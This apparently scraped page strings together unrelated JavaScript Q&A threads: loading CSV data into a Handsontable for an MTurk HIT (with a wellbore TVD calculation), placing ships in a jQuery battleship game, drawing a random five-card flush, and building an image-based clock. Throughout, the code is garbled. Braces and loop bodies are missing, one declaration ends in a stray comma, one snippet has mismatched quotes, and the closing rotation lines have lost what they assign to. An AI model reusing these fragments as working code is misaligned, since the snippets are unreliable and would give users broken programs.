I made a fiddle for testing my javascript. I was originally unable to grab csv data because the cross origin request header was not set for my google cloud bucket. Upon modifying the json header and pulling the data into my fiddle I got things working. Upon implementation within the MTurk Worker sandbox for testing my data no longer pulls into my handson table and furthermore no error is present in the console. I really am not sure what the issue would be so I am posting here as I have nothing to go off of. Any suggestions to search on would be much appreciated.
Additional Info: Chrome stopped working for my link with This page isn’t working redirected you too many times.
Try clearing your cookies.
however the HIT displays fine in firefox.
var csvLink = '';
var data = [];
//var trueTVD = X6J374YZ;
var trueTVD = 700;
d3.csv(csvLink, function(dat) {
for (i = 0; i < dat.length; i++) {
var inner = [];
inner.push(dat[i]['Measured Depth']);
var container1 = document.getElementById('Table'),
var hot1 = new Handsontable(container1, {
data: data,
colHeaders: ['Measured Depth', "Inclination", "Azimuth"],
rowHeaders: true,
minSpareRows: 0,
contextMenu: ['row_above', 'row_below', 'remove_row']
function countRows() {
var ht = hot1
var rowcount = ht.countRows() - ht.countEmptyRows();
return rowcount;
/////////////////////////////////////////Begin Functions for Minimum Curvature Algorithm////////////////////////////
function Beta(I1, I2, Az1, Az2) {
var dI = Deg2Rad(I2) - Deg2Rad(I1);
var dA = Deg2Rad(Az2) - Deg2Rad(Az1);
var X = math.sin(Deg2Rad(I1)) * math.sin(Deg2Rad(I2));
var Y = math.cos(dI);
var Z = math.cos(dA);
var beta = math.acos(Y - (X * (1 - Z)));
return beta;
function RF(beta) {
var b = beta;
var rf = (2 / b) * math.tan(b / 2);
return rf;
function TVD(dmd, I1, I2, RF) {
var A = math.cos(Deg2Rad(I1)) + math.cos(Deg2Rad(I2));
var tvd = (dmd / 2) * A * RF;
return tvd;
function Deg2Rad(deg) {
return deg * math.pi / 180;
function Rad2Deg(rad) {
return rad * 180 / math.pi
// function to calculate the TVD
function TVDcalc(MD, INC, AZI, Depth) {
var md = MD;
var inc = INC;
var azi = AZI;
var i;
for (i = 0; i < md.length - 1; i++) {
var beta = Beta(inc[i], inc[i + 1], azi[i], azi[i + 1]);
if (inc[i] == inc[i + 1]) {
var rf = 1;
} else {
var rf = RF(beta);
var dMD = md[i + 1] - md[i];
Depth.push(TVD(dMD, inc[i], inc[i + 1], rf) + Depth[i]);
return Depth
/////////////////////////////////////////End Functions for Minimum Curvature Algorithm////////////////////////////
function enable(TVD) {
if (TVD[TVD.length - 1] >= trueTVD - 5 && TVD[TVD.length - 1] <= trueTVD + 5) {
//console.log(TVD[TVD.length - 1]);
$('#submitButton').prop("disabled", false);
} else {
$('#submitButton').prop("disabled", true);
function submitForm() {
var htContents = hot1.getSourceData() //getSourceData(1,1,countRows(),3)
var md = [];
var inc = [];
var azi = [];
var Depth = [];
var fd = Number($('#TVD1').val())
//transform the HOT into individual arrays for ingestion in TVD calc
for (i = 0; i < countRows(); i++) {
var TVD = TVDcalc(md, inc, azi, Depth)
console.log("".concat("Calculated TVD: ", Math.round(Depth[Depth.length - 1])));
console.log("".concat("Expected TVD: ", trueTVD))
d3.csv is asynchronous in nature, the question d3: make the d3.csv function syncronous answers my question however I ended up just using ajax instead.

I am tring to create "Sinking ships" using jQuery

So far I am tring to make functions for placing ships on board and I have some problems with function for checking is some field available. My basic idea is to have one method which will be called on button click:
var raspolozivo=parseInt($("#raspolozivo1x1").text());
generisi1x1();//call for function that generate random field
var novoRaspolozivo= raspolozivo-1;
alert("Rasporedjeni svi raspolozivi brodovi ovog tipa!");
and it will call function to generate random field:
function generisi1x1(){
var minR = 0;
var maxR = 9;
var minK = 0;
var maxK = 9;
randRed=Math.floor(Math.random() * (maxR - minR + 1)) + minR;
randKol=Math.floor(Math.random() * (maxK - minK + 1)) + minK;
proveri1x1(randRed,randKol);//call to function to check is field available
than function generisi1x1() calls function that checks is that field available:
function proveri1x1(randRed,randKol){
alert("red:"+" "+i+" kolona:"+j);
else { postavi1x1(randRed,randKol);}
And my problem is that sometimes this work great(at least it looks that work great,maybe pure luck), and sometimes it generate only 3 ships 1x1(there should be 4) , sometimes it show me message about problem and generate 5 ships(4 on right places, 1 on bad) etc.
Printscreen of bad case: Added ship 1x1 on position 5,3 right next to ship 4x1
Here is live demo of entire code: Live demo
So far I made available to insert ships 4x1 and 1x1, and doing check only for 1x1, plan is to do the same for all ships, any help would be great.
You will find it easier to understand if proveri1x1() performs the checks and returns true or false, and generisi1x1() performs the postavi1x1() action;
function generisi1x1() {
var minR = 0, maxR = 9, minK = 0, maxK = 9;
randRed = Math.floor(Math.random() * (maxR - minR + 1)) + minR;
randKol = Math.floor(Math.random() * (maxK - minK + 1)) + minK;
if(proveri1x1(randRed, randKol)) { //call to function to check is field available
} else {
generisi1x1();//try again
function proveri1x1(randRed, randKol) {
for(var i=randRed-1; i<randRed+2; i++) {
for(var j=randKol-1; j<randKol+2; j++) {
if($(".red" + i + ".kolona" + j).hasClass('deoBroda')) {
return false;
return true;//<<<< note the position of this return statement

Select Random Images, check if in specific range and display accordingly

I need to draw 5 cards, and check whether these are of the same type (Heart, Spade etc.)
I given them names from 1-52 (where 1-13 are hearts, etc.)
Now I need to create a JavaScript function that selects 5 cards from these 52 checks if these are of same type (eg. spade)
If it's true, than show those cards in a table, otherwise, repeat loop till successful and I need to show how many times the loop repeated.
I tried some approaches, but since I don't know much about JavaScript, I'm stuck. Could someone please help me with this?
Here is what I've tried :
function flush() {
for (var picked_card = 0; picked_card < 6; picked_card++) {
var picked_card = Math.floor(Math.random() * 52) + 1;
'<img src="' + picked_card + '" '.jpg />'
Here you go:
var hand = [];
var loopCount = 0;
while (hand.length < 5) {
var picked_card = Math.floor(Math.random() * 52) + 1;
var handEmpty = hand.length == 0;
if (handEmpty) {
else {
var cardInHand = hand.indexOf(picked_card) != -1;
var handColor = Math.floor((hand[0] - 1) / 13);
var cardColor = Math.floor((picked_card - 1) / 13);
if (!cardInHand && cardColor == handColor) {
else {
And to display:
for(i in hand) {
document.write('<td><img src="' + hand[i] + '.jpg" /></td>');
To find the card-type make an integer-division by 13 of the 'card name', using names of 0..51. for 0..12 you'll get 0: Heart, for 13..25 1: Spade, etc. Than draw while picking cards of the same type; re-try on the first card of another type. When you got 5 cards together, you're done.
function drawFlush() {
for(var count = 0;; count++) {
var type = -1;
var picked_cards = [];
while(picked_cards.length < 5) {
var card;
do {
card = Math.floor(Math.random() * 52);
} while( -1 != picked_cards.indexOf(card));
var card_type = Math.floor( card / 13);
if( -1 == type) {
type = card_type;
} else {
if(card_type != type) {
return {
number_of_tries : count,
picked_cards : picked_cards
#Samy: right, not pick a card twice ;-)
Note: Here it is counted how many times a complete hand of 5 cards must be drawn until the first 'flush' appears. In theory, this should average on 1 * (12/51) * (11/50) * (10/49) * (9/48), for each draw as the number of 'positive' possible choices out of the number of remaining cards, if you're interested in this.

Javascript clock to change hour, minute, second with image

i'm confuse my clock not work
i have made pictures for hour, minute, second and am/pm
i have tried this scripts
<script language="JavaScript1.1"> <!--
/* Live image clock III Written by Alon Gibli ( Visit for this script and more
// Setting variables dig = new Image() dig[0] = '0.gif' dig[1] = '1.gif' dig[2] = '2.gif' dig[3] = '3.gif' dig[4] = '4.gif' dig[5] = '5.gif' dig[6] = '6.gif' dig[7] = '7.gif' dig[8] = '8.gif' dig[9] = '9.gif'
//writing images document.write('<table border=1 cellspacing=0 bgcolor="silver">') document.write('<tr><td><img src="0.gif" name="hrs1"></img>') document.write('<img src="0.gif" name="hrs2"></img>') document.write('<td><img src="col.gif"></img>') document.write('<td><img src="0.gif" name="mins1"></img>') document.write('<img src="0.gif" name="mins2"></img>') document.write('<td><img src="col.gif"></img>') document.write('<td><img src="0.gif" name="secs1"></img>') document.write('<img src="0.gif" name="secs2"></img>') document.write('<td><img src="am.gif" name="ampm"></img></table>')
//starting clock function function showTime() { now = new Date ampmtime = now.getHours() - 12 thisHrs = '' + now.getHours() + '' thisMin = '' + now.getMinutes() + '' thisSec = '' + now.getSeconds() + ''
if (thisHrs > 9) { if (thisHrs >= 12) {
document.ampm.src = 'pm.gif'
if (thisHrs==12)
if (thisHrs > 12) {
newHrs = '' + ampmtime + ''
if (newHrs <= 9) {
document.hrs1.src = dig[0]
document.hrs2.src = dig[newHrs.charAt(0)]
if (newHrs > 9) {
document.hrs1.src = dig[newHrs.charAt(0)]
document.hrs2.src = dig[newHrs.charAt(1)]
} } else {
document.ampm.src = 'am.gif'
document.hrs1.src = dig[thisHrs.charAt(0)]
document.hrs2.src = dig[thisHrs.charAt(1)] } } if (thisHrs <= 9) { document.ampm.src = 'am.gif' if (thisHrs == 0) {
document.hrs1.src = dig[1]
document.hrs2.src = dig[2] } else {
document.hrs1.src = dig[0]
document.hrs2.src = dig[thisHrs.charAt(0)] } } if (thisMin > 9) { document.mins1.src = dig[thisMin.charAt(0)] document.mins2.src = dig[thisMin.charAt(1)] } if (thisMin <= 9) { document.mins1.src = dig[0] document.mins2.src = dig[thisMin.charAt(0)] } if (thisSec > 9) { document.secs1.src = dig[thisSec.charAt(0)] document.secs2.src = dig[thisSec.charAt(1)] } if (thisSec <= 9) { document.secs1.src = dig[0] document.secs2.src = dig[thisSec.charAt(0)] } setTimeout("showTime()",1000) }
window.onload=showTime // --> </script>
how to change every hour,minute, second and am/pm with images i have made?
i have tried many ways but failed :(
thank you :)
Ordinarily I'd approach this with a sprite sheet in mind as you have 135 unique images and traditionally that would mean 135 requests to a web server which would result in poor performance. Technically your images are simple enough that the effect could be generated using CSS or SVG quite easily too...
However because that feels like cheating the question and because you haven't specified a particular size for your clock; I've stuck with a solution using individual images - though I have taken measures to optimise your images for this example which I will explain first.
The images in your zip file are 400x298 pixels totalling 4MB (this is arguably not web-friendly) and if you can't resize them (IE. you actually want a big clock) then you should consider compressing the images. For the sake of this example and other people's bandwidth I've reduced the images to 50x37 and compressed them using pngquant (highly recommend checking this out).
I've also base64-encoded the images and dumped them in a javascript object that looks like so:
Clock.prototype.imgs = {
hrs:[...], // array(13)
min:[...], // array(60)
sec:[...], // array(60)
gmt:[...] // array(2)
This means that all the images can be loaded into the page in a single request and understood by the browser by means of a data URI.
All in all file-size cut down to ~150KB :)
And so to the script: (I've tried to keep it as straight-forward as possible)
First you need to leave an element in the page to hook on to, eg:
<div id="myClock"></div>
and then in your script tags:
new Clock;
function Clock(){
// setup our DOM elements
var clock = document.getElementById('myClock');
this.elHrs = document.createElement('img');
this.elMin = document.createElement('img');
this.elSec = document.createElement('img');
this.elGmt = document.createElement('img');
// set a timer to update every second
this.tick = setInterval((function(scope){
return function(){ scope.draw(); }
})(this), 1000);
this.draw = function(){
var date = new Date,
gmt = Math.floor(date.getHours()/12),
hrs = date.getHours(),
min = date.getMinutes(),
sec = date.getSeconds(),
uri = 'data:image/png;base64,';
if(hrs!=12) hrs %= 12;
this.elHrs.src = uri + this.imgs.hrs[hrs];
this.elMin.src = uri + this.imgs.min[min];
this.elSec.src = uri + this.imgs.sec[sec];
this.elGmt.src = uri + this.imgs.gmt[gmt];
setInterval(() => {
d = new Date();
htime = d.getHours();
mtime = d.getMinutes();
stime = d.getSeconds();
hrotation = 30 * htime + mtime / 2;
mrotation = 6 * mtime;
srotation = 6 * stime; = `rotate(${hrotation}deg)`; = `rotate(${mrotation}deg)`; = `rotate(${srotation}deg)`;
}, 1000);

